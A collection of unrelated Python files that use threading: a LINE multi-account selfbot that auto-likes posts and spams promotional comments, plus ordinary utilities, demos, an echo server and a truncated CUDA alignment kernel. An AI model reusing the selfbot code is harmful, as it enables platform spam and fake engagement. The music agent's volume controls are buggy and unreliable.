#k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#print "Like"
#except:
#pass
#else:
#print "Already Liked"
#time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
#def likePost():
# for zx in range(0,500):
# hasil = cl.activity(limit=500)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
#if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
#try:
#cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#print "Like"
#except:
#pass
#else:
#print "Status Sudah di Like Boss"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
Commands.py
|
import threading
from ..Environment import env, env_driver
from ..Helpers import DummyLogger, DummyThread
class Kwargs(object):
"""
An object used for passing **kwargs with your *args.
Example:
@has_kwargs
def some_controller_func(first_arg, second_arg, some_arg=True, other_arg='NA'):
print first_arg, second_arg
print some_arg, other_arg
a = ('hello', 'world', Kwargs({'some_arg': 'HELLO', 'other_arg': 'WORLD!!!'}))
some_controller_func(*a)
"""
def __init__(self, dictionary):
try:
dictionary.keys()
except:
raise TypeError('Kwargs requires a dictionary, got a {}'.format(type(dictionary)))
self.dictionary = dictionary
def __len__(self):
return len(self.dictionary)
def __getitem__(self, key):
return self.dictionary[key]
def __setitem__(self, key, value):
self.dictionary[key] = value
def __delitem__(self, key):
del self.dictionary[key]
return self
def __iter__(self):
try:
for k, v in self.dictionary.iteritems():
yield k, v
except AttributeError:
for k, v in self.dictionary.items():
yield k, v
class BaseCommandFactory(object):
def __init__(self, controllers, logging=False, attach_drivers=True, wait_timeout=30, dummy_logger_prints=False,
log_file='main_log.txt'):
if type(controllers) != dict:
raise TypeError('controllers must be a dictionary of controllers.')
self.attach_drivers = attach_drivers
self.log_file = log_file
self.logging_val = logging
if logging:
# Set up the logger #
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(ThreadedCommandFactory.__name__)
# Create log handler for writing to file. #
handler = logging.FileHandler(self.log_file)
handler.setLevel(logging.DEBUG)
# Create a logging format. #
formatter = logging.Formatter(
'%(asctime)s - %(name)s.%(levelname)s: %(message)s',
datefmt='%m-%d-%Y %H:%M:%S'
)
handler.setFormatter(formatter)
# Add the handlers to the logger.
logger.addHandler(handler)
self.logger = logger
else:
self.logger = DummyLogger(prints=dummy_logger_prints, level='DEBUG')
self.controllers = controllers
self.wait_timeout = wait_timeout
self.pool = []
if attach_drivers:
self.logger.info('Attaching drivers.')
self._attach_drivers()
self.logger.info('Drivers attached.')
def __len__(self):
return len(self.controllers)
def __setitem__(self, key, value):
self.controllers[key] = value
def __getitem__(self, item):
return self.controllers[item]
def __delitem__(self, key):
self._shutdown_driver(key)
del self.controllers[key]
def __iter__(self):
try:
for k, v in self.controllers.iteritems():
yield k, v
except AttributeError:
for k, v in self.controllers.items():
yield k, v
def _attach_drivers(self):
"""
Attach separate drivers to each controller.
:return:
"""
try:
items = self.controllers.iteritems()
except AttributeError:
items = self.controllers.items()
for key, args in items:
if 'attach_driver' in dir(args):
args.attach_driver(env_driver(env('BROWSER'))(), timeout=self.wait_timeout)
def _shutdown_driver(self, key, retry=True):
try:
self.controllers[key].driver.close()
except:
pass
try:
self.controllers[key].driver.quit()
except:
pass
if retry:
self._shutdown_driver(key, retry=False)
return self
def shutdown(self):
"""
Shut down the WebDriver instances.
:return: None
"""
try:
items = self.controllers.iteritems()
except AttributeError:
items = self.controllers.items()
for key, controller in items:
self._shutdown_driver(key)
return None
class ThreadedCommandFactory(BaseCommandFactory):
"""
Used for creating threaded commands. Each controller must use a separate instance of WebDriver.
Example:
controllers = {
'google': google_controller,
'yahoo': yahoo_controller
}
thread_manager = ThreadedControllerManager(controllers, attach_drivers=True)
"""
def create_command(self, target, command_pack):
"""
Create threads for the given target function. The command pack is used to provide args
to the target function.
Example of basic setup:
def do_login(controller, username, password):
return controller.do_login(username, password)
m = ThreadedCommandFactory({
'google': google_controller,
'bing': bing_controller
}
)
cmd = do_login_command = {
'google': ('google_username', 'google_password'),
'bing': ('bing_username', 'bing_password')
}
cmd = m.create_command(do_login, do_login_command)
cmd.start()
:param target: function
:param command_pack: dict
:return: Command
"""
if type(command_pack) != dict:
raise TypeError('Expected a dictionary for the command_pack variable.')
self.logger.info('Creating threads.')
try:
items = command_pack.iteritems()
except AttributeError:
items = command_pack.items()
for key, args in items:
args = (self.controllers[key],) + args
thread = threading.Thread(target=target, args=args)
self.pool.append(thread)
# Swap variables.
thread_pool, self.pool = self.pool, []
return Command(self.logging_val, thread_pool, log_file=self.log_file)
class CommandFactory(BaseCommandFactory):
def create_command(self, target, command_pack, dummy_logger_prints=False):
"""
Create a command that will execute jobs one by one.
:param target: function
:param command_pack: dict
:param dummy_logger_prints: bool
:return: Command
"""
if type(command_pack) != dict:
raise TypeError('Expected a dictionary for the command_pack variable.')
self.logger.info('Creating command.')
try:
items = command_pack.iteritems()
except AttributeError:
items = command_pack.items()
for key, args in items:
args = (self.controllers[key],) + args
thread = DummyThread(target=target, args=args)
self.pool.append(thread)
pool, self.pool = self.pool, []
return Command(self.logging_val, pool, log_file=self.log_file, dummy_logger_prints=dummy_logger_prints)
class Command(object):
def __init__(self, logging, pool, dummy_logger_prints=False, log_file='command_log.txt'):
self.log_file = log_file
if logging:
# Set up the logger #
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(Command.__name__)
# Create log handler for writing to file. #
handler = logging.FileHandler(self.log_file)
handler.setLevel(logging.DEBUG)
# Create a logging format. #
formatter = logging.Formatter(
'%(asctime)s - %(name)s.%(levelname)s: %(message)s',
datefmt='%m-%d-%Y %H:%M:%S'
)
handler.setFormatter(formatter)
# Add the handlers to the logger.
logger.addHandler(handler)
self.logger = logger
else:
self.logger = DummyLogger(prints=dummy_logger_prints, level='DEBUG')
self.pool = pool
def start(self, dump_pool=True, join_threads=True):
"""
Start the threads in the thread pool.
:param dump_pool: bool
:param join_threads: bool
:return: self
"""
self.logger.info('Starting command.')
for thread in self.pool:
thread.start()
if join_threads:
for i, thread in enumerate(self.pool):
thread.join()
self.logger.debug('Thread #{} joined: {}'.format(i, thread))
if dump_pool:
self.logger.debug('Dumping pool.')
self.dump_pool()
return self
def dump_pool(self):
"""
Remove the threads from the thread pool.
:return: self
"""
self.pool = []
self.logger.info('Threads dumped, 0 threads in pool.')
return self
|
music.py
|
#!/usr/bin/env python3
from bs4 import BeautifulSoup
import pafy
from time import sleep
from threading import Thread
from urllib.parse import *
import urllib.request
import vlc
from topics.topic import TopicAgent
from utils.logging.console_logger import ConsoleLogger
NAME = "music"
COMPARISON_COMMANDS = [
"Play bad touch from blodhound gang.",
"Play nothing else matters.",
"Play the piano man by billy joel.",
"Stop playing music.",
"Raise the volume.",
"Lower the volume.",
"Stop music.",
"Resume music."
]
class MusicAgent(TopicAgent):
def __init__(self, messenger):
super(MusicAgent, self).__init__(
messenger=messenger,
name=NAME,
comparison_commands=COMPARISON_COMMANDS)
self._logger = ConsoleLogger()
self._player = None
self._messenger.register_callback(self.process)
def _get_url(self, title):
# based on https://github.com/dashvinsingh/YoutubeAudio-Python-Stream/blob/master/youtube_stream.py
query = urllib.parse.quote(title)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib.request.urlopen(url)
sleep(1)
html = response.read()
try:
soup = BeautifulSoup(html, 'lxml')
video_urls = soup.findAll(attrs={'class': 'yt-uix-tile-link'})
video_url = 'https://www.youtube.com' + video_urls[0]['href']
except IndexError:
return self._get_url(title)
video = pafy.new(video_url)
best = video.getbestaudio()
playurl = best.url
return playurl
def _play_audio_from_url(self, url):
Instance = vlc.Instance()
self._player = Instance.media_player_new()
Media = Instance.media_new(url)
Media.get_mrl()
self._player.set_media(Media)
self._player.play()
while self._player and not self._player.is_playing():
sleep(0.2)
while self._player is not None and self._player.is_playing():
sleep(1)
def _play_audio(self, title):
self._logger.info('play entered')
if self._player and self._player.is_playing():
self._stop_audio()
url = self._get_url(title)
playing_thread = Thread(target=self._play_audio_from_url, args=[url])
playing_thread.start()
def _pause_audio(self):
print('pause entered')
if self._player is not None:
self._player.pause()
def _stop_audio(self):
self._logger.info('stop entered')
if self._player is not None:
self._player.stop()
self._player = None
def _resume_audio(self):
self._logger.info('resume entered')
if self._player is not None:
self._player.pause()
def _raise_volume(self):
self._logger.info('raise volume entered')
if self._player is not None:
volume = self._player.audio_get_volume()
raised_volume = max(volume + 10, 100)
self._player.audio_set_volume(raised_volume)
def _lower_volume(self):
self._logger.info('lower volume entered')
if self._player is not None:
volume = self._player.audio_get_volume()
raised_volume = min(volume - 10, 0)
self._player.audio_set_volume(raised_volume)
def process(self, command):
if 'play' in command:
# TODO: Use more elaborate nlp
title = command.split("play")[-1]
self._play_audio(title)
elif 'pause' in command:
self._pause_audio()
elif 'resume' in command:
self._resume_audio()
elif 'stop' in command:
self._stop_audio()
elif 'raise' in command:
self._raise_volume()
elif 'lower' in command:
self._raise_volume()
return ''
def run(self):
self._messenger.start_listening()
def stop(self):
self._messenger.stop_listening()
# ma = MusicAgent()
# ma.process('play bad touch')
# sleep(5)
# ma.process('pause music')
# sleep(5)
# ma.process('resume music')
# sleep(5)
# ma.process('louder!!!')
# sleep(5)
# ma.process('stop music playback.')
# sleep(3)
# ma.process('play californication by rhcp')
|
initiate.py
|
from tkinter import Tk , Label , Button , PhotoImage;
from tkinter.ttk import Progressbar;
from tkinter.filedialog import asksaveasfile
from threading import Thread;
from os import remove , fdopen;
from sys import getsizeof;
from tempfile import mkstemp;
from time import time , sleep , strftime , gmtime;
import wave;
import pyaudio;
import audioop;
import numpy as np;
class MainWin(Tk) :
def __init__(self,title) :
Tk.__init__(self);
self.title(title);
self.resizable(False,False);
self.geometry("500x50")
self.columnconfigure(1,weight=1);
self.rowconfigure(0,weight=1);
self._part();
self.count= 0;
self.size = 0;
self.stop = False;
self.play = False;
self.starter = True;
def _part(self) :
self.dataSize = Label(self,text="0B".center(10," "))
self.dataSize.grid(row=0,column=0,padx=10,sticky="ew");
self.progressBar = Progressbar(self,mode="determinate")
self.progressBar["maximum"] = 100;
self.progressBar.grid(row=0,column=1,ipady=3,sticky="ew");
self.clockLabel = Label(self,text="00:00:00");
self.clockLabel.grid(row=0,column=2,padx=10,sticky="ew");
self.actionBtn = Button(self,text="jesus",relief="flat",command=self._onAction);
self.actionBtn.grid(row=0,column=3,padx=5);
self.stopBtn = Button(self,text="jesus",relief="flat",state="disabled",command=self._onStop);
self.stopBtn.grid(row=0,column=4,padx=5);
try : image = PhotoImage(file="img/play.png")
except : pass;
else : self.actionBtn.configure(image=image);self.actionBtn.img = image;
try : image = PhotoImage(file="img/stop.png")
except : pass;
else : self.stopBtn.configure(image=image);self.stopBtn.img = image;
self.bind("<space>" , lambda x : self._onAction());
def voice(self) :
def callback(inData,frameCount,timeInfo,statues) :
if self.stop :
file = open(self.nameTemp,"rb")
binaries = b''.join(file.readlines())
pathName = self.saveFile();
if pathName != None :
waveFile = wave.open(pathName, 'wb')
waveFile.setnchannels(2)
waveFile.setsampwidth(audio.get_sample_size(pyaudio.paInt16))
waveFile.setframerate(44100)
waveFile.writeframes(binaries)
waveFile.close()
file.close();
self.fileTemp.close();
remove(self.nameTemp);
self.reset()
return (inData,pyaudio.paComplete);
else :
vis = np.fromstring(inData,dtype=np.int16);
peak = np.average(np.abs(vis))*2;
self._updateProgressBar(int(int(peak)*100/2**16));
if self.play :
#print(inData)
self.fileTemp.write(inData);
self.size += getsizeof(inData);
self.dataSize.configure(text=self.formateSize(self.size))
return (inData,pyaudio.paContinue);
else : return (inData,pyaudio.paContinue);
audio = pyaudio.PyAudio();
stream = audio.open(
format=pyaudio.paInt16,
channels=2,
rate=44100,
input=True,
frames_per_buffer=1024,
stream_callback=callback
);
def _changeFlags(self) :
if self.play : file = "img/play.png";self.play=False;
else : file = "img/pause.png";self.play=True;
try :
image = PhotoImage(file=file);
except : pass
else : self.actionBtn.configure(image=image);self.actionBtn.img=image
def _onStop(self) : self.stop = True;
def _updateProgressBar(self,value) : self.progressBar["value"] = value;
def _onAction(self) :
self._changeFlags();
if self.starter :
self.starter = False;
self.handlerTemp , self.nameTemp = mkstemp();
self.fileTemp = fdopen(self.handlerTemp , "wb");
self._updateTime();
self.voice();
self.stopBtn.configure(state="normal")
@staticmethod
def _startNewThread(func) :
thread = Thread(target=func,args=());
thread.setDaemon(True)
thread.start();
@staticmethod
def saveFile() :
f = asksaveasfile(mode='wb', defaultextension=".wav")
if f is None : return
f.close()
return f.name
@staticmethod
def formateSize(num, suffix='B') :
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi'] :
if abs(num) < 1024.0 :
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0;
return ("%.1f%s%s" % (num, 'Yi', suffix));
def reset(self) :
try : image = PhotoImage(file="img/play.png")
except : pass;
else : self.actionBtn.configure(image=image);self.actionBtn.img = image;
try : image = PhotoImage(file="img/stop.png")
except : pass;
else : self.stopBtn.configure(image=image,state="disabled");self.stopBtn.img = image;
self.size = 0;
self.count = 0;
self.starter = True;
self.play = False;
self.stop = False;
self.progressBar["value"] = 0;
self.dataSize.configure(text="0B".center(10," "))
self.clockLabel.configure(text="00:00:00");
def _updateTime(self) :
if self.stop : return;
if self.play : self.count += 0.2;self.clockLabel.configure(text=str(strftime("%H:%M:%S", gmtime(self.count))));self.after(200,self._updateTime);
else : self.after(200,self._updateTime);
def run(self) :
self.mainloop();
MainWin("jesus christ").run();
|
threads01.py
|
import threading, time
def mi_thread(miNumero):
while True:
print("thread numero", num)
time.sleep(miNumero)
if __name__ == "__main__":
for num in range(1, 10):
elThread = threading.Thread(target=mi_thread, args=(num,), daemon=True) # que pasa si saco la coma?x
elThread.start()
while True:
pass
|
threads.py
|
#
# CastPodder thread management code
# Copyright (c) 2005-2006 Scott Grayban and the CastPodder Team
#
# $Id: threads.py 147 2006-11-07 08:17:03Z sgrayban $
"""
CastPodder is Copright © 2005-2006 Scott Grayban
Read the file Software_License_Agreement.txt for more info.
"""
__license__ = "Commercial"
import threading
import logging
import hooks
import sys
COM = False
try:
import pythoncom
COM = True
except ImportError:
pass
log = logging.getLogger('iPodder')
# TODO: add all the COM initialisation stuff
def mklogmethod(level):
"""Make a log method for `SelfLogger`."""
def logmethod(self, *a, **kw):
self.log(level, *a, **kw)
logmethod.__doc__ = "Issue tagged level %d log record." % level
return logmethod
class SelfLogger(object):
"""Mixin class to give objects the ability to log via their own
methods. It's useful for threads wanting to identify themselves
when they log, for example."""
def __init__(self, log=None, tag=None):
"""Initialise the generic thread."""
if log is None:
self.__log = logging.getLogger('iPodder')
else:
self.__log = log
classname = self.__class__.__name__
if tag is None:
self.__tag = "%s %d" % (classname, id(self))
else:
self.__tag = "%s %d %s" % (classname, id(self), repr(tag))
def log(self, level, msg, *args, **kwargs):
"""Issue a tagged log entry via our logger."""
msg = "%s reports: " + msg
args = list(args) # take a copy
args.insert(0, self.__tag)
self.__log.log(level, msg, *args, **kwargs)
# Construct logging methods at various levels
fatal = mklogmethod(logging.CRITICAL)
critical = mklogmethod(logging.CRITICAL)
error = mklogmethod(logging.ERROR)
warning = mklogmethod(logging.WARNING)
warn = warning
info = mklogmethod(logging.INFO)
debug = mklogmethod(logging.DEBUG)
spam = mklogmethod(int(logging.DEBUG/2)) # heh
def exception(self, msg, *args, **kwargs):
kwargs['exc_info'] = 1
self.error(msg, *args, **kwargs)
class OurThread(threading.Thread, SelfLogger):
"""Generic thread."""
def __init__(self, log=None, target=None, *a, **kw):
"""Initialise the generic thread."""
self.hooks = hooks.HookCollection()
self.exc_info = None
self.target = target
# if we have a name, steal it
self.name = kw.get('name')
# Initialise our parents
SelfLogger.__init__(self, log=log, tag=self.name)
threading.Thread.__init__(self, *a, **kw)
def run(self):
"""Run .our_run(), catching exceptions."""
target = self.target
if target is None:
target = self.our_run
try:
if COM:
pythoncom.CoInitialize()
try:
target()
except:
self.exc_info = sys.exc_info()
self.exception("Uncaught exception.")
raise # just in case threading.Thread catches it in some
# standard way in a later version of Python
finally:
if COM:
pythoncom.CoUninitialize()
def catch(self):
"""Check for exceptions and re-raise them in the calling thread."""
if self.exc_info is not None:
one, two, three = self.exc_info
raise one, two, three
if __name__ == '__main__':
logging.basicConfig()
log.setLevel(logging.DEBUG)
sl = SelfLogger(log=log, tag="soon to die")
sl.fatal("I can see the fnords!")
def boom():
raise AssertionError, "KABOOM!"
ot = OurThread(target=boom)
ot.fatal("Boo?")
ot.start()
ot.join()
ot.catch()
|
handler.py
|
"""
This module contains the ControlHandler class.
Created on Jan 21, 2016
@author: Nicklas Boerjesson
"""
import threading
from of.common.logging import write_to_log, EC_SERVICE, SEV_ERROR
from of.common.messaging.factory import reply_with_error_message
from of.common.queue.handler import Handler
__author__ = 'Nicklas Börjesson'
class ControlHandler(Handler):
"""
The ControlHandler is responsible for executing the agent-level commands, as stopping, starting and supervising
the monitors of the system.
"""
#: A map between schema Ids and handlers
schema_id__handler = None
#: The base folder for all repositories
repository_base_folder = None
#: The process monitor, responsible for communication with the worker processes
worker_monitor = None
#: The message monitor responsible for communication with entities outside of the agent
message_monitor = None
# A callback to the stop agent function
stop_agent = None
def __init__(self, _process_id, _worker_monitor, _message_monitor, _stop_agent):
"""
Initialize control handler
:param _process_id: The currenct process Id
:param _worker_monitor: A worker monitor instance
:param _message_monitor: The monitor for in- and outgoing message for the client
:param _stop_agent: A callback function that stops the entire agent process
"""
super(ControlHandler, self).__init__(_process_id)
self.schema_id__handler = {"ref://bpm.message,agent.control": self.handle_agent_control_message}
self.worker_monitor = _worker_monitor
self.message_monitor = _message_monitor
self.stop_agent = _stop_agent
def on_monitor_init(self, _monitor):
"""
When the monitor initializes, it calls this callback and it by this able to register its queue with the message
handler.
:param _monitor: The monitor instance
:return:
"""
self.message_monitor.handler.control_queue = _monitor.queue
def handle_error(self, _error_message, _message):
"""
A generic function for handling errors
:param _error: The error message
"""
write_to_log("An error occured, replying with an error message. Error: " + str(_error_message),
_category=EC_SERVICE, _severity=SEV_ERROR)
self.message_monitor.queue.put([None,
reply_with_error_message(self, _message, _error_message)])
def handle_agent_control_message(self, _message_data):
"""
This methond executes commands in agent level control messages
:param _message_data: The command message
:return:
"""
def _command_local(_command):
self.write_dbg_info(self.log_prefix + "Told by user " + _message_data["userId"] +
" to " + _command + ", reason: " + _message_data["reason"])
# Call the agent stop_agent()-callback
if _command == "stop":
self.stop_agent(_reason=_message_data["reason"], _restart=False)
elif _command == "restart":
self.stop_agent(_reason=_message_data["reason"], _restart=True)
# Run commands in a separate thread
_control_thread = threading.Thread(target=_command_local, args=[_message_data["command"]])
_control_thread.start()
def handle(self, _message_data):
"""
This is the generic message handler for the control handler
:param _message_data: The message data
"""
self.write_dbg_info("Handling message : " + str(_message_data))
try:
_schema_id = _message_data["schemaRef"]
except KeyError:
self.handle_error("No schema id found in message.", _message_data)
return
try:
_handler = self.schema_id__handler[_schema_id]
except KeyError:
self.handle_error("No handler found for schema Id " + str(_schema_id), _message_data)
return
try:
_handler(_message_data)
except Exception as e:
self.handle_error("Error running handler for " + str(_schema_id) + ": " + str(e), _message_data)
def shut_down(self, _user_id):
"""
Shut down the handler, also shuts down the worker and message monitors
:param _user_id: The user_id that initiated the shut down
:return:
"""
super(ControlHandler, self).shut_down(_user_id)
# stop the workers(reverse_order= before the messaging handlers
# (or else they can't communicate their states to the broker)
self.worker_monitor.stop(_reverse_order=True)
# stop messaging
self.message_monitor.stop()
|
multi_echo_server.py
|
#!/usr/bin/env python3
import socket
import time
from multiprocessing import Process
#define address & buffer size
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
#get host information
def get_remote_ip(host):
print(f'Getting IP for {host}')
try:
remote_ip = socket.gethostbyname( host )
except socket.gaierror:
print ('Hostname could not be resolved. Exiting')
sys.exit()
print (f'Ip address of {host} is {remote_ip}')
return remote_ip
def handle_echo(addr, conn):
print("Connected by", addr)
#recieve data, wait a bit, then send it back
full_data = conn.recv(BUFFER_SIZE)
time.sleep(0.5)
conn.sendall(full_data)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
def main():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#bind socket to address
s.bind((HOST, PORT))
#set to listening mode
s.listen(2)
#continuously listen for connections
while True:
conn, addr = s.accept()
print("Connected by", addr)
p = Process(target=handle_echo,args=(addr,conn))
p.daemon = True
p.start()
print("Started process", p)
if __name__ == "__main__":
main()
|
hgbrian_GPU_NW.py
|
# Approach: for each sequence, call a function modifying hgbrian's NW code
# to get the score.
import numba
from numba import cuda, float32
import numpy as np
# for testing
import nw_align_mod
import time
import sys
import copy
from multiprocessing import Process, Pipe
A_SMALL_FLOAT = -100000.
# Constant matrices for DNA-to-integer conversion
NTLIST = ["","A","C","G","T","N","-"]
NTDICT = dict((j,i) for i,j in enumerate(NTLIST))
N_VAL = ord('N')
# For reference: it looks like Python, but it ain't.
# https://docs.anaconda.com/numbapro/CUDAPySpec
# Written as a formattable string, not just code, because cuda.local.array requires the size to be specified with raw constants.
# And why not pass in the other parameters that way while I'm at it?
KERNEL_STR = """@cuda.jit
def hgbrian_score_kernel(seq_arr, len_arr, out_arr):
max_gaps = {max_gaps}
gap= {gap} #-1
match= {match} #1
mismatch= {mismatch} #0
eps = 1e-8
pos = cuda.threadIdx.x + cuda.blockIdx.x * cuda.blockDim.x
if pos < seq_arr.size - 1: # Check array boundaries
max_i = len_arr[pos]
max_j = len_arr[pos+1]
# Break immediately if alignment impossible
if abs(max_i - max_j) > max_gaps:
out_arr[pos] = A_SMALL_FLOAT
else:
# ensure seq_i is the longer of the two
if max_j > max_i:
t = max_i
max_i = max_j
max_j = t
seqi = seq_arr[pos+1,...][:max_i]
seqj = seq_arr[pos,...][:max_j]
else:
seqi = seq_arr[pos,...][:max_i]
seqj = seq_arr[pos+1,...][:max_j]
last_score = cuda.local.array({local_size}, dtype=float32) # 2*max_gaps + 1 # could be made faster using shared memory, but I don't think the kernel is the bottleneck
score = cuda.local.array({local_size}, dtype=float32) # 2*max_gaps + 1
for q in range(len(last_score)):
score[q] = abs(q-max_gaps)*gap
for i in range(0, max_i):
ci = seqi[i]
for p in range(len(last_score)):
last_score[p] = score[p]
for q in range(len(score)):
# Ignore the spaces in the grid that require more than max_gaps indels
j = i - max_gaps + q
if j < 0 or j >= max_j:
score[q] = A_SMALL_FLOAT
else:
cj = seqj[j]
